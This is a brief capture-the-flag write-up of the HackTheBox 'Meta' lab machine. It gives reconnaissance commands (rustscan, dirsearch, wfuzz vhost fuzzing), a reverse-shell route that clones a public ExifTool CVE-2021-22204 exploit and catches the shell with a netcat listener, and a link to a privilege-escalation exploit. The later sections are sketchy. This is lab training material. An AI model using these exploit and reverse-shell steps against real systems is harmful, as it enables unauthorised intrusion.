Today I decide to create the HackTheBox Meta WriteUp, is a medium machine running Linux released on 22 Jan 2022.

sudo rustscan -a 10.129.17.37 --

I’ve started scanning the machine using rustscan and detect two open ports, 22 and 80

Port 22 is running SSH I move on and start scanning port 80.

port 80

On port 80 we have a webserver and we can notice the domain used on title tag and add it to the /etc/hosts file.

echo '10.129.17.37  artcorp.htb' >> /etc/hosts

On the index page we have a simple website, and I found nothing investigating the source code.

HackTheBox Meta WriteUp 14

Search Directories on Port 80

Searching for new directories result 

dirsearch -u http://artcorp.htb

Enumerate Virtual Hosts

wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://artcorp.htb/" -H "Host: FUZZ.artcorp.htb" --hl 154
open http://dev01.artcorp.htb/metaview/

Get a Reverse Shell – CVE-2021-22204

After spending more than 20m thinking and analyzing the the page I notice the answer was in front of me! Metadata!

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git
sudo apt install djvulibre-bin exiftool

Edit the exploit.py file and add your IP and Port from your listener.

Start your listener and run the exploit

rlwrap -cAr nc -lvnp 4430
python3 exploit.py

Escalate Privileges to User

https://github.com/Hood3dRob1n/CVE-2016-3714

Escalate Privileges to R00t

$XDG_CONFIG_HOME defines the base directory relative to which user-specific configuration files should be stored.

Description

HackTheBox Meta Writeup!

old, Hack The Box, Hacking Playgrounds
Tagged in:
, , ,